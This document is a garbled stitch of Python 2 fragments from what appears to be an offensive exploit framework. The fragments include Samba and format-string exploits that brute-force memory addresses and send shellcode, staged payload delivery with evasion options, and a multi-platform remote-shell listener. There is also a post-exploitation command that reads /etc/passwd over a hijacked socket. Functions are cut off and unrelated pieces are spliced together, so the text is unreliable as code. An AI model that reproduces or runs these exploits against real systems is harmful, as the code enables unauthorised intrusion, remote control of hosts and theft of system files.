def talloc_destructor(self, p_destructor):
self.log("[+] destructor -> 0x%X" % p_destructor)
try:
self.connect()
#print "ATTACH!"; sys.stdin.read(1)
self.LsaLookupSids(256, 272, p_destructor)
trigger = self.myDCE.dcerpc_connection.s.recv(1)
if trigger.find('G') != -1:
self.log("[*] Found trigger .. initializing Linux node ..")
self.myDCE.dcerpc_connection.s.send('O')
node = linuxNode()
node.parentnode = self.socknode
shellServer = MosdefShellServer('Linux', 'i386')
shellServer(self.myDCE.dcerpc_connection.s, node)
node.startup()
self.setSucceeded()
return node
except Exception, msg:
print "[!] Exception! (%s)" % msg
import traceback
traceback.print_exc(file=sys.stdout)
def bsdshellserver(*args, **kargs):
print """
WARNING bsdshellserver called, you should replace it by MosdefShellServer('BSD', 'i386') ...
"""
_bsdshellserver = MosdefShellServer('BSD', 'i386')
return _bsdshellserver(*args, **kargs)
def linuxshellserver(*args, **kargs):
print """
WARNING linuxshellserver() called. you should replace it by MosdefShellServer('Linux', 'i386')...
"""
#just to let us know where we came from
#normally you odn't really want to see this
#and if you use print_exc you'll cause real problems - None exceptions, etc.
#so only print stack and don't do this normally!
#traceback.print_stack(file=sys.stderr)
_linuxshellserver = MosdefShellServer('Linux', 'i386')
return _linuxshellserver(*args, **kargs)
def runsploit(self):
"""
Construct the attack
"""
try:
s = self.gettcpsock()
s.connect((self.host, self.port))
except:
self.log("Could not connect")
self.setInfo(
"%s attacking %s:%d - done (failed: could not connect!)" %
(NAME, self.host, self.port))
return 0
STEP_SIZE = 0x100
what = 0x0a0d4141
where = 0xbffffffc - 0x2000
while where < (0xbffffffc - STEP_SIZE):
fs = self.write4(what, where, ALIGN, (REQUEST_SIZE / 4) + DPA,
REQUEST_SIZE + len(PREPEND))
request = "R+" * (REQUEST_SIZE / 2 -
1) + "\r\n" + fs + self.shellcode
ret, response = send_and_get(s, request)
if not ret:
self.log("Failed: %s" % response)
return 0
self.log("Got %d reply bytes, counting R's" % len(response))
r_count = response.count('R')
expected_r_count = (REQUEST_SIZE / 2) - 1
self.log("Got r_count %d expecting %d" %
(r_count, expected_r_count))
if r_count != expected_r_count:
self.log(
"R_count different! Hit buf at %x, confirming what value" %
where)
a_count = response.count('A')
if a_count == 2:
self.log("Buf hit confirmed! a_count=%d" % a_count)
bufstart = where - r_count * 2
what = bufstart + REQUEST_SIZE + len(fs)
where = bufstart - 8 * 4
self.log("Buf start is @ %x ... Shellcode is @ %x" %
(bufstart, what))
brutetop = where - 4 * 256
while brutetop < where:
#alignment and DPA are blind
fs = self.write4(what, where, ALIGN,
REQUEST_SIZE / 4 + DPA,
REQUEST_SIZE + len(PREPEND))
request = "R+" * (REQUEST_SIZE / 2 -
1) + "\r\n" + fs + self.shellcode
ret, response = send_and_get(
s, request, special='G') # 'X' for normal shell
if not ret:
self.log("Failed: %s" % response)
self.setInfo("Failed to brute force")
return 0
else:
# using the static payload until we fix/clean MOSDEF stubs
if 'X' in response and SHELLCODE in self.shellcode:
self.log("Got it ... shell mode")
s.send('O')
import telnetlib
t = telnetlib.Telnet()
t.sock = s
t.write("uname -a;id\n")
t.interact()
sys.exit(0)
elif 'G' in response and 'GPSD' not in response:
# MOSDEF
self.log("Got it ... MOSDEF mode")
s.send('O')
if self.stage2 != '':
# sets blocking ... blocking code assumes socket is in ebx
s.send(intel_order(len(self.stage2)))
s.send(self.stage2)
newnode = linuxNode()
newnode.parentnode = self.argsDict[
"passednodes"][0]
shellServer = MosdefShellServer(
'Linux', 'i386')
shellServer(s, newnode)
newnode.startup()
self.setSucceeded()
return newnode
where -= 4
else:
self.log("Buf hit not confirmed")
where += STEP_SIZE
self.log("Finished without getting a shell :<")
return 0
telnetshell = Telnet()
telnetshell.sock = ftp.sock
telnetshell.sock.send(
'/sbin/ifconfig -a;cat /etc/passwd;uname -a\n')
return telnetshell
else:
# MOSDEF .. payload reads blindly 255 bytes and then goes into MOSDEF
# because our MOSDEF code mmaps from /dev/zero we HAVE to break chroot
from MOSDEFShellServer import MosdefShellServer
from linuxNode import linuxNode
node = linuxNode()
node.parentnode = self.argsDict["passednodes"][0]
shellServer = MosdefShellServer('Linux', 'i386')
shellServer(ftp.sock, node)
node.startup()
self.setSucceeded()
return node
else:
return 0
# 0 == crash, 1 == alive and well, 2 == timed out
return 1
def ftp_setup(self, host, port):
tries = 3
def run(self):
self.get_args()
self.host = self.target.interface
if self.version not in VERSIONS:
self.log('### Error: no such version')
return None
desc, stage0, stage1, shell_type = VERSIONS[self.version]
self.log('Attacking %s:%s using: %s' % (self.host, self.port, desc))
if self.covertness >= 2:
self.log(
"DCERPC crypto enabled, set covertness to 1 and try again if exploit fails!"
)
self.privacy = True
if self.covertness >= 5 and self.covertness < 11:
self.log('Crypto + moderate SMB fragmentation')
self.frag_level = 1
elif self.covertness == 11:
self.log('Crypto + MAX fragmentation (VERY SLOW)')
self.frag_level = 2
try:
x = Samba(self.host,
privacy=self.privacy,
payload=stage0,
frag_level=self.frag_level)
if self.debug == True:
self.log('### Attach ...')
sys.stdin.read(1)
self.log('### Computer Hacking: %s' % self.host)
s, resp = x.ndr_push_eventlog_reportevent()
if 'JINX' in resp:
self.log('### Succesfully Hacked Computer!')
self.log('### Staging to stage1 payload, version: %s' % desc)
s.send('JINX')
s.send(struct.pack('<L', len(stage1)) + stage1)
if shell_type == 'shell':
tn = Telnet()
tn.sock = s
node = unixShellNode.unixShellNode()
node.parentnode = self.argsDict['passednodes'][0]
node.shell = shelllistener(shellfromtelnet(tn),
simpleShell=1)
return node
if shell_type == 'mosdef':
node = linuxNode()
node.parentnode = self.argsDict['passednodes'][0]
shellServer = MosdefShellServer('Linux', 'i386')
shellServer(s, node)
node.startup()
return node
else:
self.log('### Failed ... version < 3.4.x or NX enabled ?')
except XError, e:
self.log('### Fatal Exploit Error: %s' % e)
def handleConnection(self, connection):
try:
connection.set_timeout(None)
except:
self.log("[!] likely an ipv6 socket, set_timeout not supported !")
server = None
if self.type == self.targets.index("LINUXEXECVE_INTEL"):
self.log("Connected: Running a Linux server...")
import linuxMosdefShellServer
#time.sleep(10)
newshell = unixShellNode()
pnode = localNode()
pnode.newNode(newshell)
server = linuxMosdefShellServer.execveshellserver(
connection, newshell)
#server.addInitString(self.initstring)
#server.addInitString("chrootbreak")
server.startup()
elif self.type == self.targets.index("LINUXMOSDEF_INTEL"):
self.log("Connected, Linux MOSDEF ...")
newshell = linuxNode()
pnode = localNode()
pnode.newNode(newshell)
shell = MosdefShellServer('Linux', 'i386')(connection, newshell)
#shell=linuxMosdefShellServer.linuxshellserver(connection,newshell)
shell.argsDict = self.argsDict
newshell.startup()
server = shell
elif self.type == self.targets.index('OSXMOSDEF_INTEL'):
self.log('Connected, OSX MOSDEF INTEL ...')
newshell = osxNode()
pnode = localNode()
pnode.newNode(newshell)
shell = MosdefShellServer('OSX', 'i386')(connection, newshell)
shell.argsDict = self.argsDict
newshell.startup()
server = shell
elif self.type == self.targets.index("OSXMOSDEF_PPC"):
self.log("Connected, OSX MOSDEF PPC ...")
import osxMosdefShellServer
newshell = osxNode()
pnode = localNode()
pnode.newNode(newshell)
shell = osxMosdefShellServer.osxshellserver(connection, newshell)
shell.argsDict = self.argsDict
newshell.startup()
server = shell
elif self.type == self.targets.index("WIN32MOSDEF_INTEL"):
self.log("Connected, running win32 MOSDEF server")
import win32MosdefShellServer
from win32Node import win32Node
newshell = win32Node()
pnode = localNode()
pnode.newNode(newshell)
shell = win32MosdefShellServer.win32shellserver(connection,
newshell,
logfunction=None)
shell.argsDict = self.argsDict
newshell.startup()
server = shell
elif self.type == self.targets.index("SOLARISMOSDEF_SPARC"):
self.log("Connected, Solaris MOSDEF ...")
import solarisMosdefShellServer
newshell = solarisNode()
pnode = localNode()
pnode.newNode(newshell)
shell = solarisMosdefShellServer.solarisshellserver(
connection, newshell)
shell.argsDict = self.argsDict
newshell.startup()
server = shell
elif self.type == self.targets.index("SOLARISMOSDEF_INTEL"):
self.log("Connected, Solaris x86 MOSDEF ...")
import solarisMosdefShellServer
newshell = solarisNode()
pnode = localNode()
pnode.newNode(newshell)
shell = solarisMosdefShellServer.solarisx86shellserver(
connection, newshell)
shell.argsDict = self.argsDict
newshell.startup()
server = shell
elif self.type == self.targets.index("BSDMOSDEF_INTEL"):
self.log("Connected, BSD MOSDEF")
import bsdMosdefShellserver
newshell = bsdNode()
pnode = localNode()
pnode.newNode(newshell)
shell = bsdMosdefShellserver.bsdshellserver(connection, newshell)
shell.argsDict = self.argsDict
newshell.startup()
server = shell
elif self.type == self.targets.index("AIXMOSDEF_51_PPC"):
self.log("Connected, AIX MOSDEF")
newshell = aixNode()
pnode = localNode()
pnode.newNode(newshell)
aixMosdefShellServer = MosdefShellServer('AIX', 'PowerPC')
shell = aixMosdefShellServer(connection, newshell, version='5.1')
shell.argsDict = self.argsDict
newshell.startup()
server = shell
elif self.type == self.targets.index("AIXMOSDEF_52_PPC"):
self.log("Connected, AIX MOSDEF")
newshell = aixNode()
pnode = localNode()
pnode.newNode(newshell)
aixMosdefShellServer = MosdefShellServer('AIX', 'PowerPC')
shell = aixMosdefShellServer(connection, newshell, version='5.2')
shell.argsDict = self.argsDict
newshell.startup()
server = shell
elif self.type == self.targets.index("PHPMULTI"):
newsocket = connection
self.log("Starting up a %s server" % type)
import phplistener
from ScriptShellServer import phpshellserver
node = ScriptNode()
node.parentnode = self.engine.getLocalNode()
shell = phpshellserver(newsocket, node)
shell.startup()
newshell = node
server = shell
elif self.type == self.targets.index("UNIXSHELL"):
newsocket = connection
self.log("Starting up Unix Shell")
pnode = localNode()
telnetshell = Telnet()
telnetshell.sock = newsocket
shell = shelllistener(shellfromtelnet(telnetshell),
logfunction=self.log)
newshell = unixShellNode()
newshell.shell = shell
shell.node = newshell
pnode.newNode(newshell)
server = shell
elif self.type == self.targets.index("JAVA"):
newsocket = connection
self.log("Starting up a %s server" % type)
from Nodes.JavaShellServer import javashellserver
from JavaNode import JavaNode
node = JavaNode()
node.parentnode = self.engine.getLocalNode()
shell = javashellserver(newsocket, node)
shell.startup()
newshell = node
server = shell
else:
print "Don't know what type I am!"
sys.exit(1)
if self.mode == "interactive":
print "Letting user interact with server"
if server:
server.interact()
else:
print "No server...exiting this shell..."
elif self.mode == "Run one command":
print "Running a command or set of commands"
if self.uploadfiles != []:
for f in self.uploadfiles:
print "Uploading %s" % f
# Why doesn't this use exploits/upload/upload.py then?
print server.upload(f)
print server.runcommand(self.command)
###insert your post-op stuff here!!!
###you might want:
###server.doexitthread(1)
###or
server.runexitprocess()
if server:
server.disconnect()
return
port = 0
openports = []
while port != -1:
port = sint32(self.readint())
if port != -1:
openports.append(port)
self.leave()
return openports
def pingSweep(self, network):
"""
pingsweep the target network
"""
solarisshellserver = MosdefShellServer('Solaris', 'sparc')
solarisx86shellserver = MosdefShellServer('Solaris', 'intel')
# for debugging
if __name__ == '__main__':
"""Reliable send to socket, returns a shellcode for use by Node and self"""
from MOSDEF.remoteresolver import remoteresolver
code = """
#import "int", "length" as "length"
#import "int", "fd" as "fd"
#import "string", "buffer" as "buffer"
#import "local", "send" as "send"
void main()
{
int i;